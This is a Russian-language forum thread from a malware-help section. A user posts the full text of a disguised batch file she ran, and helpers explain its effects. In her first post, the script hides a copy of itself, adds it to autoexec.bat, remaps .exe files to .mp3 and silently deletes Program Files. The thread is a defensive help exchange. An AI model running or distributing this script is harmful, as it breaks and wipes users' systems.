Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   [решено] что это за вирус? (http://forum.oszone.net/showthread.php?t=181048)

anas 20-07-2010 22:26 1457030

что это за вирус?
 
как то зпустила у себя ".cmd", и перестал работать практический все файлы ехе-шки и т.д.
переустановила ОС, после установки стала устанавливать программы, но некоторые программы не стали работать
оказалось дата стояла на 2100 чем-то, поменяла на нынешнюю, вроде все заработала, но я не пойму что это за вирус (если этого можно назвать вирусом)

вот содержимое:

@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md HOOLI
md HULII
md DURDOMM
md BICHI
Label E: BAMBEI
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD

help? 20-07-2010 22:40 1457043

Здравствуйте.Если подозреваете заражение Выполните правила

thyrex 20-07-2010 22:44 1457047

Думаю, что теперь сказать что-либо определенное уже невозможно

На всякий случай выполните правила и предоставьте логи

anas 20-07-2010 23:04 1457059

Ну здравствуйте,
Цитата:

Цитата help?
Выполните правила »

Цитата:

Цитата thyrex
На всякий случай выполните правила и предоставьте логи »

чтобы выполнить эти правила придеться еще раз запустить этот .cmd, и тогда я не смогу открыть все ехе файлы в том числе и браузеры и АВЗ, CureIt, HijackThis и другие
приведу пример, вот ехе файл нажимаешь а он превращаеться на скрытый и не открываеться

я просила как предотварить без переустановки ОС, если еще раз такое случиться,
содержимого ведь привела, тогда зачем вам лог, если и так содержимое есть

okshef 20-07-2010 23:08 1457062

anas, практически, это баловство (жестокое):
Цитата:

Цитата anas
assoc .exe=.mp3 »

все программы ассоциировались с музыкальными файлами. Ну и еще кое-что. (Удаление папки Program Files :))
Вывод - не запускайте то, что не знаете. В остальном - следуйте рекомендациям .

anas 20-07-2010 23:17 1457067

Цитата:

Цитата okshef
Вывод - не запускайте то, что не знаете »

это уже понятно, но как не запустить файл с интересным названием и значком?:)

Цитата:

Цитата okshef
В остальном - следуйте рекомендациям »

вроде уже понятень что не возможно запустить ехе файлы

okshef 20-07-2010 23:19 1457068

P.S. А уж бат-ник запускать, точно не следует. Поищите в корне раздела С: файл ski.bat (скрытый), откройте блокнотом и посмотрите, что в нем.

thyrex 20-07-2010 23:22 1457072

anas, Вы же после заражения систему переустановили? Или я чего-то не пойму

anas 20-07-2010 23:28 1457076

Цитата:

Цитата okshef
Поищите в корне раздел »

оо... я уже решила этого по своему, переустановивь ОС и с неоднакратным форматированием диска:)
вот на днях случайно нашла этот cmd файл, и хотелось бы знать как тогда решить эту проблему без переустановки,
дома я не одна, есть и другие которые может тупо запустить этот кошмарный файл
P.S. но я не хочу еще раз запускать его, чтобы представить вам логи и другие файлы, сами подумайте

Цитата:

Цитата thyrex
Вы же после заражения систему переустановили? »

да но
Цитата:

Цитата anas
вот на днях случайно нашла этот cmd файл, и хотелось бы знать как тогда решить эту проблему без переустановки »


thyrex 20-07-2010 23:35 1457087

Цитата:

Цитата anas
P.S. но я не хочу еще раз запускать его, чтобы представить вам логи и другие файлы, сами подумайте »

Чтобы выполнить правила, не нужно запускать этот файл

anas 20-07-2010 23:38 1457091

Цитата:

Цитата thyrex
Чтобы выполнить правила, не нужно запускать этот файл »

в чем проблема, что еще вам надо? :(

thyrex 21-07-2010 00:20 1457120

Больше ничего. Спасибо.

Модераторы, закройте тему

Drongo 21-07-2010 13:18 1457519

Тема закрыта. Для открытия темы топикстартер может обратиться в РМ, для всех остальных - создавайте новую тему с учетом правил


Время: 02:21.

Время: 02:21.
© OSzone.net 2001-